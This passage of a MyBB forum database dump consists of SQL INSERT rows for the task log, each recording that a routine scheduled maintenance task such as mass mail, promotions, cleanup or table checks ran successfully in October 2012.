INSERT INTO mybb_tasklog VALUES('10302', '5', '1350276308', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10303', '9', '1350276967', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10304', '3', '1350277204', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10305', '1', '1350277220', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10306', '7', '1350277229', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10307', '5', '1350277618', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10308', '9', '1350278221', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10309', '5', '1350278923', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10310', '9', '1350278951', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10311', '3', '1350279248', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10312', '9', '1350280496', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10313', '5', '1350280504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10314', '9', '1350280625', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10315', '3', '1350280766', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10316', '1', '1350280810', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10317', '7', '1350280821', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10318', '5', '1350281590', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10319', '9', '1350282944', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10320', '5', '1350283194', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10321', '3', '1350283321', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10322', '9', '1350283337', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10323', '5', '1350283507', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10324', '9', '1350287072', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10325', '3', '1350287598', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10326', '1', '1350288438', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10327', '7', '1350288486', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10328', '5', '1350288519', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10329', '9', '1350288543', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10330', '3', '1350288545', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10331', '9', '1350289238', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10332', '5', '1350289826', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10333', '9', '1350290562', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10334', '3', '1350290595', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10335', '5', '1350290714', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10336', '9', '1350291305', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10337', '3', '1350291554', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10338', '1', '1350291611', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10339', '7', '1350291619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10340', '5', '1350291974', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10341', '9', '1350292424', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10342', '5', '1350293225', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10343', '9', '1350293228', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10344', '3', '1350293863', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10345', '9', '1350294036', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10346', '5', '1350294521', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10347', '9', '1350295750', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10348', '3', '1350295775', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10349', '1', '1350296330', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10350', '7', '1350296343', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10351', '5', '1350296445', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10352', '9', '1350296862', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10353', '5', '1350296883', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10354', '3', '1350297346', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10355', '9', '1350298282', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10356', '5', '1350298377', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10357', '9', '1350300968', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10358', '3', '1350300972', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10359', '1', '1350300987', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10360', '7', '1350300988', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10361', '5', '1350300991', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10362', '9', '1350302074', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10363', '5', '1350302124', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10364', '9', '1350302142', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10365', '3', '1350302943', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10366', '1', '1350302950', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10367', '7', '1350302975', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10368', '4', '1350302970', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10369', '5', '1350302979', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10370', '9', '1350306115', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10371', '5', '1350306122', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10372', '3', '1350306137', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10373', '1', '1350306140', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10374', '7', '1350306152', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10375', '5', '1350307868', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10376', '9', '1350308170', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10377', '3', '1350308354', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10378', '9', '1350308549', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10379', '5', '1350308760', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10380', '9', '1350309725', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10381', '3', '1350309748', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10382', '1', '1350309959', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10383', '7', '1350309984', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10384', '5', '1350310291', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10385', '9', '1350310328', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10386', '5', '1350312524', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10387', '9', '1350313009', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10388', '3', '1350313046', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10389', '3', '1350315019', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10390', '1', '1350315026', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10391', '7', '1350315029', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10392', '5', '1350315234', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10393', '9', '1350315258', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10394', '9', '1350315624', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10395', '5', '1350316372', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10396', '9', '1350316949', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10397', '3', '1350316955', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10398', '1', '1350316960', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10399', '7', '1350318859', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10400', '5', '1350318906', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10401', '9', '1350319772', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10402', '3', '1350319781', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10403', '5', '1350319837', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10404', '9', '1350320205', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10405', '3', '1350321264', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10406', '1', '1350321281', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10407', '7', '1350321308', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10408', '5', '1350321311', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10409', '9', '1350321391', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10410', '5', '1350321905', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10411', '9', '1350321933', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10412', '3', '1350322205', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10413', '9', '1350323349', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10414', '5', '1350323358', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10415', '9', '1350323825', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10416', '3', '1350324326', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10417', '1', '1350324343', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10418', '7', '1350324346', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10419', '5', '1350324749', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10420', '9', '1350324760', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10421', '5', '1350325705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10422', '9', '1350325750', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10423', '3', '1350326580', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10424', '9', '1350326788', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10425', '5', '1350326791', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10426', '9', '1350327402', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10427', '3', '1350327595', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10428', '1', '1350327670', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10429', '7', '1350327858', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10430', '5', '1350327950', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10431', '9', '1350328558', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10432', '5', '1350329101', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10433', '9', '1350329118', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10434', '3', '1350329407', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10435', '9', '1350330005', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10436', '5', '1350330302', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10437', '9', '1350330941', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10438', '3', '1350331141', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10439', '1', '1350331209', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10440', '7', '1350331216', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10441', '5', '1350331509', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10442', '9', '1350332199', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10443', '5', '1350332717', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10444', '9', '1350332730', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10445', '3', '1350333028', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10446', '9', '1350333686', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10447', '5', '1350334072', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10448', '9', '1350334763', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10449', '3', '1350334768', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10450', '1', '1350334859', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10451', '7', '1350334861', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10452', '5', '1350335312', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10453', '9', '1350335585', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10454', '5', '1350336507', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10455', '9', '1350336546', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10456', '3', '1350336610', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10457', '9', '1350337730', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10458', '5', '1350337733', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10459', '9', '1350338153', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10460', '3', '1350338510', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10461', '1', '1350338518', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10462', '7', '1350338523', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10463', '5', '1350339626', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10464', '9', '1350339637', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10465', '5', '1350339919', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10466', '9', '1350339955', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10467', '3', '1350340387', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10468', '9', '1350341229', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10469', '5', '1350341238', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10470', '9', '1350341974', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10471', '3', '1350341977', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10472', '1', '1350342001', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10473', '7', '1350342011', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10474', '5', '1350342664', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10475', '9', '1350342680', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10476', '5', '1350343546', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10477', '9', '1350343937', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10478', '3', '1350343942', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10479', '9', '1350344718', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10480', '5', '1350344723', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10481', '9', '1350346384', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10482', '3', '1350346390', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10483', '1', '1350346393', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10484', '2', '1350346404', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10485', '7', '1350346482', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10486', '11', '1350346512', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10487', '5', '1350346586', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10488', '5', '1350347119', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10489', '9', '1350347138', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10490', '3', '1350347407', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10491', '9', '1350348153', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10492', '5', '1350348326', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10493', '9', '1350349149', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10494', '3', '1350349155', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10495', '1', '1350349215', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10496', '7', '1350349220', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10497', '5', '1350349526', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10498', '9', '1350349844', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10499', '5', '1350351752', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10500', '9', '1350352503', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10501', '3', '1350352514', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10502', '5', '1350352525', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10503', '3', '1350352747', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10504', '1', '1350352801', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10505', '7', '1350352810', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10506', '5', '1350353230', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10507', '9', '1350353475', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10508', '5', '1350354321', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10509', '9', '1350354380', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10510', '3', '1350354683', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10511', '9', '1350355373', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10512', '5', '1350355501', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10513', '9', '1350356208', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10514', '3', '1350356352', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10515', '1', '1350356456', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10516', '7', '1350356460', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10517', '5', '1350356819', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10518', '9', '1350357166', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10519', '5', '1350357904', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10520', '9', '1350357985', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10521', '3', '1350358214', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10522', '9', '1350358872', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10523', '5', '1350359264', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10524', '9', '1350359718', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10525', '3', '1350359941', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10526', '1', '1350360002', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10527', '7', '1350360009', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10528', '5', '1350360352', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10529', '9', '1350360607', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10530', '5', '1350361664', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10531', '9', '1350361676', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10532', '3', '1350361902', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10533', '9', '1350362506', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10534', '5', '1350366927', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10535', '9', '1350369415', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10536', '3', '1350370305', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10537', '1', '1350373142', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10538', '7', '1350373166', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10539', '5', '1350373764', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10540', '9', '1350373775', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10541', '3', '1350373798', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10542', '9', '1350374250', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10543', '3', '1350374359', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10544', '1', '1350374530', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10545', '7', '1350374553', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10546', '5', '1350374740', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10547', '9', '1350375161', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10548', '5', '1350376641', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10549', '9', '1350376658', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10550', '3', '1350376671', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10551', '9', '1350376821', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10552', '5', '1350377106', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10553', '9', '1350378883', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10554', '3', '1350378888', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10555', '1', '1350379096', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10556', '7', '1350379445', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10557', '5', '1350379452', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10558', '5', '1350379521', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10559', '9', '1350379630', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10560', '3', '1350380194', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10561', '9', '1350383224', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10562', '5', '1350383228', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10563', '3', '1350383238', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10564', '1', '1350383242', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10565', '7', '1350383497', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10566', '3', '1350383659', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10567', '9', '1350384008', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10568', '5', '1350384321', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10569', '9', '1350386184', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10570', '3', '1350386199', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10571', '1', '1350386205', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10572', '7', '1350386235', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10573', '5', '1350386268', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10574', '5', '1350386835', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10575', '9', '1350386840', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10576', '3', '1350387012', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10577', '9', '1350388152', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10578', '5', '1350388155', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10579', '9', '1350388537', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10580', '3', '1350388823', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10581', '1', '1350388850', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10582', '4', '1350388877', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10583', '7', '1350388879', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10584', '5', '1350389239', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10585', '9', '1350389460', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10586', '5', '1350390940', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10587', '9', '1350391167', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10588', '3', '1350391171', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10589', '9', '1350391214', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10590', '5', '1350391530', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10591', '9', '1350392974', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10592', '3', '1350392999', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10593', '1', '1350393008', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10594', '7', '1350393010', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10595', '5', '1350393033', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10596', '9', '1350393039', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10597', '5', '1350394039', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10598', '9', '1350394049', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10599', '3', '1350394300', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10600', '9', '1350394987', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10601', '5', '1350395119', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10602', '9', '1350395735', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10603', '3', '1350396345', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10604', '1', '1350396351', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10605', '7', '1350396413', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10606', '5', '1350396461', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10607', '9', '1350398732', 'The mass mail 